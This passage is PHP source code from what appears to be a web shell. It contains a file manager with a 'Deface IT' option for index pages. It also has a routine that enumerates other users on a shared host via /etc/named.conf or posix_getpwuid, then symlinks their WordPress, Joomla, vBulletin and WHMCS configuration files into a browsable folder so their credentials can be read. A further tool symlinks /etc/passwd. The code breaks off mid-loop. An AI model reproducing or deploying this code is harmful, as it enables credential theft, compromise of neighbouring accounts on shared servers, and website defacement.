1035 echo "<td align=center><font size=2>";
1036 echo getOGid($val)."</font></td>";
1037 } ?>
1038 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1039 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1040 <td></td>
1041 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1042 </tr></font>
1043 <?php
1044 }
1045 else if(is_file($vv))
1046 {
1047 ?>
1048 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1049 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1050
1051 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1052
1053 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1054
1055 <?php if($os != 'Windows')
1056 {
1057 echo "<td align=center><font size=2>";
1058 echo getOGid($val)."</font></td>";
1059 } ?>
1060 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1061
1062 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1063 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
1064 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1065 </tr>
1066 <p>
1067 <?php
1068 }
1069 }
1070
1071 echo "</table>
1072<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
1073<select class=sbox name=choice style='width: 100px;'>
1074 <option value=delete>Delete</option>
1075 <option value=chmod>Change mode</option>
1076 if(class_exists('ZipArchive'))
1077 { <option value=compre>Compress</option>
1078 <option value=uncompre>Uncompress</option> }
1079 </select>
1080
1081 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1082 }}
1083 else
1084 {
1085 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1086 }
1087
1088}
1089if(isset($_REQUEST["script"]))
1090{
1091 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1092 ?>
1093 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1094 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1095 </tr></table></center>
1096 <?php
1097}
1098else if(isset($_REQUEST['manuallyscript']))
1099{
1100 ?>
1101 <center>
1102 <form action="<?php echo $self; ?>" method="post">
1103 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1104 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1105 </form>
1106 </center>
1107 <?php
1108}
1109else if(isset($_REQUEST['scriptlocator']))
1110{
1111 if(stristr(php_uname(),"Linux"))
1112 {
1113 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1114 $path=explode('/',$url);
1115 $url =str_replace($path[count($path)-1],'',$url);
1116 function syml($usern,$pdomain)
1117 {
1118 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1119 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1120 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1121 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1122 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1123 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1124 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1125 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1126 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1127 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1128 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1129 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1130 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1131 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1132 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1133 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1134 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1135 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1136 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1137 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1138 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1139 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1140 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1141 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1142 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1143 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1144 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1145 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1146 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1147 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1148 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1149 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1150 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1151 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1152 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1153 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1154 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1155 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1156 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1157 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1158 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1159 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1160 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1161 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1162 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1163 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1164 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1165 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1166 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1167 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1168 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1169 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1170 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1171 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1172 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1173 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1174 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1175 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1176 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1177 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1178 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1179 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1180 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1181 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1182 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1183 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1184 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1185 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1186 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1187 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1188 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1189 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1190 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1191 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1192 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1193 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1194 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1195 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1196 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1197 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1198 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1199 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1200 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1201 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1202 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1203 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1204 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1205 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1206 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1207 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1208 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1209 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1210 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1211 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1212 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1213 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1214 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1215 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1216 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1217 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1218 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1219 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1220 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1221 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1222 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1223 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1224 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1225 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1226 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1227 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1228 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1229 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1230 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1231 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1232 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1233 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1234 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1235 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1236 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1237 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1238 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1239 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1240 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1241 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1242 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1243 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1244 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1245 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1246 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1247 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1248 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1249 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1250 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1251 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1252 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1253 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1254 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1255 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1256 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1257 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1258 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1259 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1260 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1261 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1262 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1263 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1264 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1265 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1266 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1267 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1268 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1269 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1270 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1271 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1272 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1273 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1274 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1275 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1276 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1277 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1278 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1279 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1280 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1281 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1282 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1283 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1284 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1285 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1286 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1287 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1288 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1289 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1290 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1291 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1292 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1293 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1294 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1295 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1296 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1297 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1298 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1299 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1300 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1301 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1302 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1303 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1304 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1305 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1306 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1307 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1308 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1309 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1310 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1311 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1312 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1313 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1314 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1315 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1316 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1317 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1318 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1319 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1320 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1321 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1322 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1323 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1324 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1325 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1326 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1327 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1328 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1329 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1330 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1331 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1332 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1333 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1334 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1335 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1336 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1337 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1338 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1339 }
1340 if(isset($_REQUEST['passwd']))
1341 {
1342 $getetc = trim($_REQUEST['passwd']);
1343
1344 mkdir("dhanushSPT");
1345 chdir("dhanushSPT");
1346
1347 $myfile = fopen("test.txt","w");
1348 fputs($myfile,$getetc);
1349 fclose($myfile);
1350
1351 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1352 while(!feof($file))
1353 {
1354 $s = fgets($file);
1355 $matches = array();
1356 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1357 $matches = str_replace("home/","",$matches[1]);
1358 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1359 continue;
1360 syml($matches,$matches);
1361 }
1362 fclose($file);
1363 unlink("test.txt");
1364 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1365 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1366
1367 }
1368 else
1369 {
1370 $d0mains = @file("/etc/named.conf");
1371 if($d0mains)
1372 {
1373 mkdir("dhanushST");
1374 chdir("dhanushST");
1375
1376 foreach($d0mains as $d0main)
1377 {
1378 if(eregi("zone",$d0main))
1379 {
1380 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1381 flush();
1382
1383 if(strlen(trim($domains[1][0])) > 2)
1384 {
1385 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1386
1387 syml($user['name'],$domains[1][0]);
1388 }
1389 }
1390 }
1391 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1392 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1393 }
1394 else
1395 {
1396 mkdir("dhanushSPT");
1397 chdir("dhanushSPT");
1398 $temp = "";
1399 $val1 = 0;
1400 $val2 = 1000;
1401 for(;$val1 <= $val2;$val1++)
1402 {
1403 $uid = @posix_getpwuid($val1);
1404 if ($uid)
1405 $temp .= join(':',$uid)."\n";
1406 }
1407 echo '<br/>';
1408 $temp = trim($temp);
1409
1410 $file5 = fopen("test.txt","w");
1411 fputs($file5,$temp);
1412 fclose($file5);
1413
1414
1415 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1416 while(!feof($file))
1417 {
1418 $s = fgets($file);
1419 $matches = array();
1420 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1421 $matches = str_replace("home/","",$matches[1]);
1422 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1423 continue;
1424 syml($matches,$matches);
1425 }
1426 fclose($file);
1427 echo "</table>";
1428 unlink("test.txt");
1429 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1430 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1431 }
1432 }
1433 }
1434 else
1435 echo "<center>Cannot Complete the task!!!!</center>";
1436
1437}
1438else if(isset($_GET["symlinkfile"]))
1439{
1440 if(!isset($_GET['file']))
1441 {
1442 ?>
1443 <center>
1444 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1445 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1446 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1447 </form></center>
1448 <br><br>
1449 <?php
1450 }
1451}
1452
1453else if(isset($_GET['symlinkmyfile']))
1454{
1455 if(stristr(php_uname(),"Linux"))
1456 {
1457 $fakedir="cx";
1458 $fakedep=16;
1459
1460 $num=0; // offset of symlink.$num
1461
1462 if(!empty($_GET['myfile']))
1463 $file=$_GET['myfile'];
1464 else $file="";
1465
1466 if(empty($file))
1467 exit;
1468
1469 if(!is_writable("."))
1470 echo "not writable directory";
1471
1472 $level=0;
1473
1474 for($as=0;$as<$fakedep;$as++)
1475 {
